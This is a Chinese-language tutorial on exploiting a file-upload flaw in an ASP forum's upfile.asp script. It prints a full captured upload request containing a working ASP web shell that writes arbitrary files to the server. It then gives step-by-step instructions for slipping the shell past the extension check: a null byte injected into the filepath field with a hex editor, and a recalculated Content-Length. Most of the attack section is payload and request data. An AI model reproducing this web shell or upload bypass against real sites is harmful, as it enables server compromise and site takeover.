解析上傳漏洞欺騙技術(shù)
實(shí)際上網(wǎng)絡(luò)中存在著很多的漏洞,通過這些漏洞的利用黑客就可能會入侵網(wǎng)站的服務(wù)器,取得管理員權(quán)限。其中不少的程序都存在著上傳漏洞,通過上傳漏洞黑客入侵者便可以上傳一個(gè)ASP木馬,然后通過上傳漏洞欺騙技術(shù)來達(dá)到自己入侵的目的。接下來本篇文章就講分析一下上傳漏洞欺騙的具體原理。
POST /bbs/upfile.asp HTTP/1.1
……. 省略了N多沒用信息
- Content-Length: 1792
- Connection: Keep-Alive
- Cache-Control: no-cache
- Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN
- -----------------------------7d52191850242
- Content-Disposition: form-data; name="filepath"
- uploadFace
- -----------------------------7d52191850242
- Content-Disposition: form-data; name="act"
- upload
- -----------------------------7d52191850242
- Content-Disposition: form-data; name="file1";
- filename="E:\木馬\asp\shell.asp"
- Content-Type: text/plain
- <% dim objFSO %>
- <% dim fdata %>
- <% dim objCountFile %>
- <% on error resume next %>
- <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
- <% if Trim(request("syfdpath"))<>"" then %>
- <% fdata = request("cyfddata") %>
- <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
- <% objCountFile.Write fdata %>
- <% if err =0 then %>
- <% response.write "<font color=red><h2>成功!</h2><font>" %>
- <% else %>
- <% response.write "<font color=red><h1>失?。。?h1></font>" %>
- <% end if %>
- <% err.clear %>
- <% end if %>
- <% objCountFile.Close %>
- <% Set objCountFile=Nothing %>
- <% Set objFSO = Nothing %>
- <% Response.write "<form action='' method=post>" %>
- <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>
- <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
- <% Response.Write "<br>" %>
- <% Response.write "地址來自" %>
- <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
- <% Response.write "<br>" %>
- <% Response.write "你的留言:" %>
- <% Response.write "<textarea name=cyfddata
- cols=80 rows=10 width=32></textarea>" %>
- <% Response.write "<input type=submit value=sky!!>" %>
- <% Response.write "</form>" %>
-----------------------------7d52191850242
Content-Disposition: form-data; name="fname"
E:\木馬\asp\shell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"
上傳
-----------------------------7d52191850242--
傳遞的信息我們獲取了,下面就來修改下達(dá)到上傳漏洞欺騙目的。主要修改一下幾點(diǎn):
1.Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"
2.Content-Disposition: form-data; name="fname"
E:\木馬\asp\shell.asp
3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我們修改成uploadFace\shell.asp后面怎么加一個(gè)空字符呢?用UltraEdit是個(gè)好方法,用16進(jìn)制編輯,(因?yàn)?\0'這個(gè)字符也占一個(gè)位置,所以我們先打入一空格,然后再在UltraEdit(用Ctrl+H轉(zhuǎn)換到16進(jìn)制模式下)里將就空格符的20改成00)。
4.還有一個(gè)地方也要修改,就是這句Content-Length: 1792表示提交數(shù)據(jù)的字符個(gè)數(shù)。
如果你修改了filepath的值那么這個(gè)長度1792也要變換,一個(gè)字母或者數(shù)字的長度就是1,不要忘記最后面那個(gè)空格那個(gè)也算1。
【編輯推薦】
- 親身體驗(yàn)MS07-029漏洞入侵
- 解析系統(tǒng)泄露密碼入侵攻擊
- 經(jīng)典后門實(shí)例之線程插入后門
- 經(jīng)典后門實(shí)例之?dāng)U展后門
- 通過數(shù)據(jù)庫下載漏洞發(fā)起網(wǎng)絡(luò)攻擊